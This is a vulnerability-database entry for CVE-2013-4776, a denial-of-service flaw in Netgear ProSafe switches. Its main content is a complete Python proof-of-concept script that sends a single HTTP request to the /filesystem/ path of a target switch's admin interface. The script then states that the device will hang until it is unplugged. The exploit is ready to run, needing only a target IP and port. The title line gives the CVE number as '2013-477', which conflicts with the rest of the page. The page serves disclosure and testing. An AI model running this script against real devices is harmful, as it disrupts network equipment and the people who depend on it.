Netgear ProSafe - Denial of Service Vulnerability

01 Jul 2014 00:00:00 | Reported by Root | Type: seebug | www.seebug.org

Netgear ProSafe - Denial of Service Vulnerability, PoC for CVE-2013-477

Related

Reporter | Title | Published | Family
0day.today | Netgear ProSafe - Denial of Service Vulnerability | 22 Aug 2013 00:00 | zdt
CVE | CVE-2013-4776 | 19 Dec 2013 02:00 | cve
Cvelist | CVE-2013-4776 | 19 Dec 2013 02:00 | cvelist
Exploit DB | Netgear ProSafe - Denial of Service | 22 Aug 2013 00:00 | exploitdb
exploitpack | NETGEAR ProSafe - Denial of Service | 22 Aug 2013 00:00 | exploitpack
NVD | CVE-2013-4776 | 19 Dec 2013 04:24 | nvd
OpenVAS | Multiple NetGear ProSafe Switches Information Disclosure Vulnerability | 22 Aug 2013 00:00 | openvas
Prion | Server side request forgery (ssrf) | 19 Dec 2013 04:24 | prion
securityvulns | Netgear ProSafe switches: Unauthenticated startup-config disclosure and Denial of Service | 9 Oct 2013 00:00 | securityvulns
securityvulns | Netgear ProSafe switches security vulnerabilities | 9 Oct 2013 00:00 | securityvulns

#!/usr/bin/python

################################################################
#                                                              #
# Netgear ProSafe - CVE-2013-4776 PoC                          #
# written by Juan J. Guelfo @ Encripto AS                      #
# [email protected]                                             #
#                                                              #
# Copyright 2013 Encripto AS. All rights reserved.             #
#                                                              #
# This software is licensed under the FreeBSD license.         #
# http://www.encripto.no/tools/license.php                     #
#                                                              #
################################################################

import sys, getopt, urllib2
from subprocess import *


__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS ([email protected])"


# Prints title and other header info
def header():
    print ""
    print " ================================================================= "
    print "|  Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""

    
# Prints help    
def help():
    header()
    print """
   Usage: python CVE-2013-4776.py [mandatory options]

   Mandatory options:
       -t target               ...Target IP address
       -p port                 ...Port where the HTTP admin interface is listening on
        
   Example:
       python CVE-2013-4776.py -t 192.168.0.1 -p 80
    """
    sys.exit(0) 

    
if __name__ == '__main__':
    
    #Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])

    except getopt.GetoptError, err:
        header()
        print "\n[-] Error: {0}.\n".format(str(err))
        sys.exit(1)
    
    if not options:
        help()
    
    target = None
    port = None
    for opt, arg in options:
        if opt in ("-t", "--target"):
            target = arg
        
        if opt in ("-p", "--port"):
            port = arg
            
    #Option input validation
    if not target or not port:
        help()
        print "[-] Error: Incorrect syntax.\n"
        sys.exit(1)
    
    header()
    headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }

    try:
        # Request /filesystem/ on the HTTP admin interface; per this PoC, that request triggers the DoS
        print "[+] Triggering DoS condition..."
        r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
        urllib2.urlopen(r,"",5).read()
    
    except urllib2.URLError:
        print "[-] Error: The connection could not be established.\n"
        
    except:
        print "[+] The switch should be freaking out..."
        print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"

    sys.exit(0)

                              
